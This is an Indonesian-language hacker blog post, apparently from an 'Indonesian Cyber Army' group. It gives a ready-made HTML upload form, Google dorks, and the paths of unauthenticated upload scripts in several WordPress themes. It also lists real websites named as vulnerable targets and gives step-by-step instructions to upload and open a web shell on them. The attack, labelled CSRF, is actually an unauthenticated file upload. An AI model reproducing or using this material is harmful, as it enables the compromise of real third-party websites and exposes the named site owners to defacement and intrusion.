Exploiting CSRF Method di Wordpress

Exploiting CSRF Method di Wordpress - Menjelang magrib, disini saya ga bisa lama-lama buat bacot nya karena mo pulang PKL dah malem beroo mana hujan lagi haduuhh ...  langsung aja ya ke tkp..

Sebelumnya apa dulu sii CSRF itu ?? bagi yg belom tau niiii ..

CRFS singkatan dari Cross-Site Request Forgery, yang juga dikenal sebagai serangan sekali klik atau session riding, dan disingkat dengan CSRF atau XSRF, adalah tipe eksploitasi kejahatan pada sebuah website, dengan menjalankan perintah yang tidak dikehendaki yang dikirimkan dari seseorang yang dipercaya oleh website. (tanyapedia.com)

1. Ini source exploit nya save dulu, kasih nama aja csrf_cbf.html :
Spoiler :
<form action="LINK VULN SITE" enctype="multipart/form-data" method="post"> <input name="url" type="jpg" value="./" /><br /> Please choose a file: <input name="uploadfile" type="file" /><br /> <input type="submit" value="upload" /> </form> Syndrom2211 ganteng


2. Ini dork nya, kali aja mo cari, nii hasil olahan sendiri.. bisa di olah lagi :
Spoiler :
inurl:/theme/functions/ inurl:/theme/ intitle:Index of /wp-content/themes
inurl:/wp-content/themes/BLAKESLEY intitle:Index of /wp-content/themes
inurl:/wp-content/themes/BLAKESLEY_2.2 intitle:Index of /wp-content/themes
inurl:/wp-content/themes/mezzon intitle:Index of /wp-content/themes
inurl:/wp-content/themes/pacifico intitle:Index of /wp-content/themes
inurl:/wp-content/themes/clockstone intitle:Index of /wp-content/themes
inurl:/wp-content/themes/wpragency intitle:Index of /wp-content/themes
inurl:/wp-content/themes/oakland intitle:Index of /wp-content/themes
inurl:/wp-content/themes/rejonesco intitle:Index of /wp-content/themes
inurl:/wp-content/themes/try intitle:Index of /wp-content/themes
inurl:/wp-content/themes/wsgreece intitle:Index of /wp-content/themes
inurl:/wp-content/themes/brilliant intitle:Index of /wp-content/themes
inurl:/wp-content/themes/qreator intitle:Index of /wp-content/themes
inurl:/wp-content/themes/haber intitle:Index of /wp-content/themes
inurl:/wp-content/themes/money intitle:Index of /wp-content/themes
inurl:/wp-content/themes/ambleside intitle:Index of /wp-content/themes

3. Ini Exploitnya :
Spoiler :
wp-content/themes/nama_theme/theme/functions/upload.php wp-content/themes/nama_theme/theme/functions/uploadbg.php wp-content/themes/nama_theme/theme/functions/upload-bg.php wp-content/themes/nama_theme/theme/functions/uploadicon.php wp-content/themes/nama_theme/theme/functions/upload-icon.php

Keterangan :
- Kalo muncul kata - kata "You Have to Login for Access This Script" ya kurang lebih gitu berarti itu ga bisa tinggalin aja,,
- Kalo muncul tulisan cuman "error" berarti vuln.
 4. Ini Demo / Percobaan Site yang vuln yg mau coba :
Spoiler :
http://www.eidgahshreef.com/wp-content/themes/blakesley/theme/functions/upload.php
http://gabrielmasliah.com/wp-content/themes/Blakesley/theme/functions/upload.php
http://www.anbaweb.org/wp-content/themes/blakesley/theme/functions/upload.php
http://www.eidgahshreef.com/wp-content/themes/blakesley/theme/functions/upload.php
http://commercialhvacsandiego.net/new-blog/wp-content/themes/BLAKESLEY_2.2/theme/functions/upload.php
http://www.geformassolucionesweb.com/uno/wp-content/themes/BLAKESLEY_2.2/theme/functions/upload.php
http://wpragency.co.uk/site/wp-content/themes/wpragency/theme/functions/upload.php
http://www.teamntics.org/wp-content/themes/oakland/theme/functions/upload.php
http://3lbs.com/company/wp-content/themes/brilliant/theme/functions/upload.php
http://hyde-park-weddings.co.uk/wp-content/themes/brilliant/theme/functions/upload.php

5. Ini Cara Exploitnya :
Di Open link new tab biar di perbesar

Keterangan Buat gambar di atas :
1. Misalkan itu contoh site yg vuln nya
2. Buka file exploit csrf nya yg tadi di atas, paste link yg vuln nya di action="Link Vuln"
3. Kemudian Save, lalu buka di browser.. Tinggal pilih shell, trus upload
4. Nah nanti akan tercipta shellnya, ngacak nama nya, trus buka shell nya di link /functions/link shell.php
5. Itu contoh yg error, bisa di ubek lagi atau di tinggalin
6. itu Contoh yang sukses , ga ada masalah

OKe cukup sekian dan terima kasih, mo pulang dulu bang wkwkwkw, kalo yang ada di tanyakan tinggal komentar..
Greetz : Indonesian Cyber Army, CBF Team

More Article :



Posted by | 6:11 PM
Exploiting CSRF Method di Wordpress - Menjelang magrib, disini saya ga bisa lama-lama buat bacot nya karena mo pulang PKL dah malem beroo ...

0 komentar:

Post a Comment

Jika ingin menyampaikan sesuatu, bisa langsung isi disini.

Quote for Today:

Hidupmu akan lebih baik ketika kamu berhenti membandingkan dirimu dengan org lain, karna yg harus kamu bandingkan adalah dirimu yg lalu dengan dirimu saat ini.